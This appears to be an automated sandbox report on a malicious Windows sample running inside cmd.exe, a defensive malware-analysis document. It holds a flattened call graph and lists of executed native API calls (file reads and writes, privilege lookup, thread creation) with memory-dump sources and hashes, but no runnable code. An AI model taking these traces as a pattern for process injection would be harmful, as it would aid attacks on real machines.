66020 d9143 66019->66020 66021 d8ec0 LdrLoadDll 66020->66021 66022 d914c 66021->66022 66023 d8ec0 LdrLoadDll 66022->66023 66024 d9155 66023->66024 66025 d8ec0 LdrLoadDll 66024->66025 66026 d915e 66025->66026 66027 d8ec0 LdrLoadDll 66026->66027 66028 d916a 66027->66028 66029 d8ec0 LdrLoadDll 66028->66029 66030 d9173 66029->66030 66031 d8ec0 LdrLoadDll 66030->66031 66032 d917c 66031->66032 66032->65810 66034 d91f0 LdrLoadDll 66033->66034 66035 d816c 66034->66035 66063 21efdc0 LdrInitializeThunk 66035->66063 66036 d8183 66036->65730 66038->65807 66040 d91f0 LdrLoadDll 66039->66040 66041 d87ec 66039->66041 66040->66041 66041->65799 66043 db286 66042->66043 66044 db280 66042->66044 66045 da290 LdrLoadDll 66043->66045 66044->65916 66046 db2ac 66045->66046 66046->65916 66048 db310 66047->66048 66049 da290 LdrLoadDll 66048->66049 66052 db36d 66048->66052 66050 db34a 66049->66050 66051 da0c0 2 API calls 66050->66051 66051->66052 66052->65924 66054 da0c0 2 API calls 66053->66054 66055 d3334 66054->66055 66055->65935 66056->65923 66058 d8edb 66057->66058 66059 d3e60 LdrLoadDll 66058->66059 66060 d8efb 66059->66060 66061 d3e60 LdrLoadDll 66060->66061 66062 d8fa7 66060->66062 66061->66062 66062->65959 66063->66036 66064->65816 66066 d891c RtlFreeHeap 66065->66066 66067 d91f0 LdrLoadDll 66065->66067 66066->65819 66067->66066 66069 c6e3b 66068->66069 66070 c6e40 66068->66070 66069->65738 66071 da040 LdrLoadDll 66070->66071 66078 c6e65 66071->66078 66072 c6ec8 66072->65738 66073 d8150 2 API calls 66073->66078 66074 c6ece 66075 c6ef4 66074->66075 66077 d8850 2 API calls 66074->66077 66075->65738 66080 c6ee5 66077->66080 66078->66072 66078->66073 66078->66074 66079 da040 LdrLoadDll 66078->66079 66084 d8850 66078->66084 66079->66078 66080->65738 66082 c710e 66081->66082 66083 d8850 2 API calls 66081->66083 66082->65699 66083->66082 66085 d91f0 LdrLoadDll 66084->66085 66086 d886c 66085->66086 66089 21efb68 LdrInitializeThunk 66086->66089 66087 d8883 66087->66078 66089->66087 66091 d9853 66090->66091 66094 c9b50 66091->66094 66095 c9b74 66094->66095 66096 c8a8b 66095->66096 66097 c9bb0 LdrLoadDll 66095->66097 66096->65707 66097->66096 66099 c9ec3 66098->66099 66101 c9f40 66099->66101 66113 d7f20 LdrLoadDll 66099->66113 66101->65712 66103 d91f0 LdrLoadDll 66102->66103 66104 ccfbb 66103->66104 66104->65720 66105 d8a60 66104->66105 66106 d8a7f LookupPrivilegeValueW 66105->66106 66107 d91f0 LdrLoadDll 66105->66107 66106->65716 66107->66106 66109 d91f0 LdrLoadDll 66108->66109 66110 d850c 66109->66110 66114 21efed0 LdrInitializeThunk 66110->66114 66111 d852b 66111->65717 66113->66101 66114->66111 66116 ca047 66115->66116 66117 c9ea0 LdrLoadDll 66116->66117 66118 ca076 66117->66118 66118->65658 66120 c9d94 66119->66120 66168 d7f20 LdrLoadDll 66120->66168 66122 c9dce 66122->65660 66124 cd1ac 66123->66124 66125 ca020 LdrLoadDll 66124->66125 66126 cd1be 66125->66126 66169 cd090 66126->66169 66129 cd1d9 66132 cd1e4 66129->66132 66133 d8720 2 API calls 66129->66133 66130 cd1f1 66131 cd202 66130->66131 66134 d8720 2 API calls 66130->66134 66131->65664 66132->65664 66133->66132 66134->66131 66136 caef6 66135->66136 66137 caf00 66135->66137 66136->65673 66138 c9ea0 LdrLoadDll 66137->66138 66139 caf71 66138->66139 66140 c9d70 LdrLoadDll 66139->66140 66141 caf85 66140->66141 66142 cafa8 66141->66142 66143 c9ea0 LdrLoadDll 66141->66143 66142->65673 66144 cafc4 66143->66144 66145 d3a60 7 API calls 66144->66145 66146 cb019 66145->66146 66146->65673 66149 c7c93 66147->66149 66188 cd440 66147->66188 66160 c7e41 66149->66160 66193 d33b0 66149->66193 66151 c7cf2 66151->66160 66196 c7a30 66151->66196 66154 db270 LdrLoadDll 66155 c7d39 66154->66155 66156 db3a0 2 API calls 66155->66156 66161 c7d4e 66156->66161 66157 c6e30 3 API calls 66157->66161 66160->65662 66161->66157 66161->66160 66163 c70f0 2 API calls 66161->66163 66201 cac10 66161->66201 66251 cd3e0 66161->66251 66255 ccec0 17 API calls 66161->66255 66163->66161 66164->65668 66165->65681 66166->65678 66167->65683 66168->66122 66170 cd0aa 66169->66170 66178 cd160 66169->66178 66171 c9ea0 LdrLoadDll 66170->66171 66172 cd0cc 66171->66172 66179 d81d0 66172->66179 66174 cd10e 66182 d8210 66174->66182 66177 d8720 2 API calls 66177->66178 66178->66129 66178->66130 66180 d91f0 LdrLoadDll 66179->66180 66181 d81ec 66180->66181 66181->66174 66183 d91f0 LdrLoadDll 66182->66183 66184 d822c 66183->66184 66187 21f07ac LdrInitializeThunk 66184->66187 66185 cd154 66185->66177 66187->66185 66189 cd45f 66188->66189 66190 d3e60 LdrLoadDll 66188->66190 66191 cd46d 66189->66191 66192 cd466 SetErrorMode 66189->66192 66190->66189 66191->66149 66192->66191 66195 d33d6 66193->66195 66256 cd210 66193->66256 66195->66151 66197 c7a55 66196->66197 66198 da040 LdrLoadDll 66196->66198 66199 c7c6a 66197->66199 66275 d7b10 66197->66275 66198->66197 66199->66154 66202 cac29 66201->66202 66203 cac2f 66201->66203 66323 cccd0 66202->66323 66332 c8630 66203->66332 66206 cac3c 66207 caec8 66206->66207 66208 db3a0 2 API calls 66206->66208 66207->66161 66209 cac58 66208->66209 66210 cac6c 66209->66210 66211 cd3e0 2 API calls 66209->66211 66341 d7fa0 66210->66341 66211->66210 66214 cad96 66358 cabb0 LdrLoadDll LdrInitializeThunk 66214->66358 66215 d8190 2 API calls 66216 cacea 66215->66216 66216->66214 66221 cacf6 66216->66221 66218 cadb5 66219 cadbd 66218->66219 66359 cab20 LdrLoadDll NtClose LdrInitializeThunk 66218->66359 66220 d8720 2 API calls 66219->66220 66224 cadc7 66220->66224 66221->66207 66222 cad3f 66221->66222 66225 d82a0 2 API calls 66221->66225 66227 d8720 2 API calls 66222->66227 66224->66161 66225->66222 66226 caddf 66226->66219 66228 cade6 66226->66228 66229 cad5c 66227->66229 66230 cadfe 66228->66230 66360 caaa0 LdrLoadDll LdrInitializeThunk 66228->66360 66344 d75c0 66229->66344 66361 d8020 LdrLoadDll 66230->66361 66234 cad73 66234->66207 66348 c7290 66234->66348 66235 cae12 66362 ca920 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 66235->66362 66238 cae36 66240 cae83 66238->66240 66363 d8050 LdrLoadDll 66238->66363 66365 d80b0 LdrLoadDll 66240->66365 66243 cae54 66243->66240 66364 d80e0 LdrLoadDll 66243->66364 66244 cae91 66245 d8720 2 API calls 66244->66245 66246 cae9b 66245->66246 66248 d8720 2 API calls 66246->66248 66249 caea5 66248->66249 66249->66207 66250 c7290 3 API calls 66249->66250 66250->66207 66252 cd3f3 66251->66252 66432 d8120 66252->66432 66255->66161 66257 cd22d 66256->66257 66263 d8250 66257->66263 66261 cd275 66261->66195 66264 d826c 66263->66264 66265 d91f0 LdrLoadDll 66263->66265 66273 21effb4 LdrInitializeThunk 66264->66273 66265->66264 66266 cd26e 66266->66261 66268 d82a0 66266->66268 66269 d91f0 LdrLoadDll 66268->66269 66270 d82bc 66269->66270 66274 21efc60 LdrInitializeThunk 66270->66274 66271 cd29e 66271->66195 66273->66266 66274->66271 66276 da290 LdrLoadDll 66275->66276 66277 d7b27 66276->66277 66296 c8170 66277->66296 66279 d7b42 66280 d7b69 66279->66280 66281 d7b80 66279->66281 66282 da0c0 2 API calls 66280->66282 66284 da040 LdrLoadDll 66281->66284 66283 d7b76 66282->66283 66283->66199 66285 d7bba 66284->66285 66286 da040 LdrLoadDll 66285->66286 66287 d7bd3 66286->66287 66293 d7e74 66287->66293 66302 da080 LdrLoadDll 66287->66302 66289 d7e59 66290 d7e60 66289->66290 66289->66293 66291 da0c0 2 API calls 66290->66291 66292 d7e6a 66291->66292 66292->66199 66294 da0c0 2 API calls 66293->66294 66295 d7ec9 66294->66295 66295->66199 66297 c8195 66296->66297 66298 c9b50 LdrLoadDll 66297->66298 66299 c81c8 66298->66299 66301 c81ed 66299->66301 66303 cb350 66299->66303 66301->66279 66302->66289 66304 cb37c 66303->66304 66305 d8470 LdrLoadDll 66304->66305 66306 cb395 66305->66306 66307 cb39c 66306->66307 66314 d84b0 66306->66314 66307->66301 66311 cb3d7 66312 d8720 2 API calls 66311->66312 66313 cb3fa 66312->66313 66313->66301 66315 d84cc 66314->66315 66316 d91f0 LdrLoadDll 66314->66316 66322 21efbb8 LdrInitializeThunk 66315->66322 66316->66315 66317 cb3bf 66317->66307 66319 d8aa0 66317->66319 66320 d8abf 66319->66320 66321 d91f0 LdrLoadDll 66319->66321 66320->66311 66321->66320 66322->66317 66366 cbdc0 66323->66366 66325 ccce7 66326 ccd00 66325->66326 66379 c3d70 66325->66379 66328 da290 LdrLoadDll 66326->66328 66330 ccd0e 66328->66330 66329 cccfa 66403 d7440 66329->66403 66330->66203 66333 c864b 66332->66333 66334 cd090 3 API calls 66333->66334 66340 c876b 66333->66340 66335 c874c 66334->66335 66336 c877a 66335->66336 66337 c8761 66335->66337 66338 d8720 2 API calls 66335->66338 66336->66206 66431 c5ea0 LdrLoadDll 66337->66431 66338->66337 66340->66206 66342 d91f0 LdrLoadDll 66341->66342 66343 cacc0 66342->66343 66343->66207 66343->66214 66343->66215 66345 d75c7 66344->66345 66346 cd3e0 2 API calls 66345->66346 66347 d75f2 66346->66347 66347->66234 66349 c72a8 66348->66349 66350 c9b50 LdrLoadDll 66349->66350 66351 c72c3 66350->66351 66352 d3e60 LdrLoadDll 66351->66352 66353 c72d3 66352->66353 66354 c72dc PostThreadMessageW 66353->66354 66355 c730d 66353->66355 66354->66355 66356 c72f0 66354->66356 66355->66161 66357 c72fa PostThreadMessageW 66356->66357 66357->66355 66358->66218 66359->66226 66360->66230 66361->66235 66362->66238 66363->66243 66364->66240 66365->66244 66367 cbdf3 66366->66367 66408 ca160 66367->66408 66369 cbe05 66412 ca2d0 66369->66412 66371 cbe23 66372 ca2d0 LdrLoadDll 66371->66372 66373 cbe39 66372->66373 66374 cd210 3 API calls 66373->66374 66375 cbe5d 66374->66375 66376 cbe64 66375->66376 66415 da2d0 LdrLoadDll 66375->66415 66376->66325 66378 cbe74 66378->66325 66380 c3d96 66379->66380 66381 cb350 3 API calls 66380->66381 66383 c3e61 66381->66383 66382 c3e68 66382->66329 66383->66382 66416 da310 66383->66416 66385 c3ec9 66386 c9ea0 LdrLoadDll 66385->66386 66387 c3fd3 66386->66387 66388 c9ea0 LdrLoadDll 66387->66388 66389 c3ff7 66388->66389 66420 cb410 66389->66420 66393 c4083 66394 da040 LdrLoadDll 66393->66394 66395 c4110 66394->66395 66396 da040 LdrLoadDll 66395->66396 66398 c412a 66396->66398 66397 c42a6 66397->66329 66398->66397 66399 c9ea0 LdrLoadDll 66398->66399 66400 c416a 66399->66400 66401 c9d70 LdrLoadDll 66400->66401 66402 c420a 66401->66402 66402->66329 66404 d7461 66403->66404 66405 d3e60 LdrLoadDll 66403->66405 66406 d7487 66404->66406 66407 d7474 CreateThread 66404->66407 66405->66404 66406->66326 66407->66326 66409 ca187 66408->66409 66410 c9ea0 LdrLoadDll 66409->66410 66411 ca1c3 66410->66411 66411->66369 66413 c9ea0 LdrLoadDll 66412->66413 66414 ca2e9 66412->66414 66413->66414 66414->66371 66415->66378 66417 da31d 66416->66417 66418 d3e60 LdrLoadDll 66417->66418 66419 da330 66418->66419 66419->66385 66421 cb435 66420->66421 66425 d8320 66421->66425 66424 d83b0 LdrLoadDll 66424->66393 66426 d91f0 LdrLoadDll 66425->66426 66427 d833c 66426->66427 66430 21efb50 LdrInitializeThunk 66427->66430 66428 c405c 66428->66393 66428->66424 66430->66428 66431->66340 66433 d91f0 LdrLoadDll 66432->66433 66434 d813c 66433->66434 66437 21efd8c LdrInitializeThunk 66434->66437 66435 cd41e 66435->66161 66437->66435 66439 d7310 66440 da040 LdrLoadDll 66439->66440 66442 d734b 66440->66442 66441 d742c 66442->66441 66443 c9b50 LdrLoadDll 66442->66443 66444 d7381 66443->66444 66445 d3e60 LdrLoadDll 66444->66445 66447 d739d 66445->66447 66446 d73b0 Sleep 66446->66447 66447->66441 66447->66446 66450 d6f40 LdrLoadDll 66447->66450 66451 d7140 LdrLoadDll 66447->66451 66450->66447 66451->66447 66452 21ef900 LdrInitializeThunk

                                                    Executed Functions

                                                    Function 000D869D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 218 d869d-d869e 219 d86a0-d86e9 call d91f0 NtReadFile 218->219 220 d8672-d8699 218->220
                                                    APIs
                                                    • NtReadFile.NTDLL(000D3D82,5E972F65,FFFFFFFF,?,?,?,000D3D82,?,A:,FFFFFFFF,5E972F65,000D3D82,?,00000000), ref: 000D86E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: *9$A:
                                                    • API String ID: 2738559852-676615714
                                                    • Opcode ID: c411b23a7d8ce458fa6bd1e8fc80453f24cf5a1fe97e172fa39a592094cb97de
                                                    • Instruction ID: 723af1f453acd6b6b34ded043a8f671caf0f62d93dd19883fe550f67978142d9
                                                    • Opcode Fuzzy Hash: c411b23a7d8ce458fa6bd1e8fc80453f24cf5a1fe97e172fa39a592094cb97de
                                                    • Instruction Fuzzy Hash: 2C1190B2200109ABCB18DF8DDC91DEB73ADAF8C754B158249BA1D93241D630E8118BB4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D85F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 265 d85f0-d8641 call d91f0 NtCreateFile
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,000D3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 000D863D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction ID: a305089da097ed719c72aed8d9c7693924ca7dab2b5e5cbbb371ccdd09c44f6a
                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction Fuzzy Hash: ECF0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D86A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 268 d86a0-d86e9 call d91f0 NtReadFile
                                                    APIs
                                                    • NtReadFile.NTDLL(000D3D82,5E972F65,FFFFFFFF,?,?,?,000D3D82,?,A:,FFFFFFFF,5E972F65,000D3D82,?,00000000), ref: 000D86E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: A:
                                                    • API String ID: 2738559852-3573652513
                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                    • Instruction ID: cc444391a9b4fa47d756e1aa691be51edd04e1dc01baa2c9c15e2ee8584cfa22
                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                    • Instruction Fuzzy Hash: CDF0A4B6200209ABCB14DF89DC85EEB77ADAF8C754F158249BE1D97241D630E811CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D8642, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 271 d8642-d864d 272 d864f 271->272 273 d860b-d8641 NtCreateFile 271->273
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,000D3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 000D863D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: be5f7221360a20a6c443f830ae1769a090a9f8139e61cb02de094cd56315abc9
                                                    • Instruction ID: 40bdf968a00312cf02a06084196dc3c8f9177077ce2f2f47a5adaaffbb2f5bc4
                                                    • Opcode Fuzzy Hash: be5f7221360a20a6c443f830ae1769a090a9f8139e61cb02de094cd56315abc9
                                                    • Instruction Fuzzy Hash: 63F0FEB2605144AFDB05CF98D981CDB77BDAF8C750715864DF94DD7205D634E801CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D871A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 280 d871a-d8749 call d91f0 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(`=,?,?,000D3D60,00000000,FFFFFFFF), ref: 000D8745
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID: `=
                                                    • API String ID: 3535843008-2748261937
                                                    • Opcode ID: 552bb225a62122dca01a74f25464fe54dcf20041e71867baa8fb27e03c7269fe
                                                    • Instruction ID: 6c231a0ba65336b0e8d38fb6170631e8be15bab50b121a01ced6871683021eda
                                                    • Opcode Fuzzy Hash: 552bb225a62122dca01a74f25464fe54dcf20041e71867baa8fb27e03c7269fe
                                                    • Instruction Fuzzy Hash: 16E08C762002046BDB11DFA8CC88EE73F18EF88320F144299BE689B292C131A600C6A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D8720, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 283 d8720-d8736 284 d873c-d8749 NtClose 283->284 285 d8737 call d91f0 283->285 285->284
                                                    APIs
                                                    • NtClose.NTDLL(`=,?,?,000D3D60,00000000,FFFFFFFF), ref: 000D8745
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID: `=
                                                    • API String ID: 3535843008-2748261937
                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                    • Instruction ID: 5c6fb173edc9d9b2d17629b9298ba0b8c7b998156a379f6dc6893e5d51a81cbb
                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                    • Instruction Fuzzy Hash: 36D01776200318ABD710EF98CC89EE77BACEF48760F154499BA189B242C530FA0086E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021F00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021F07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021EFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021EFB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                    • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                    • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                    • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021EFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021EFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
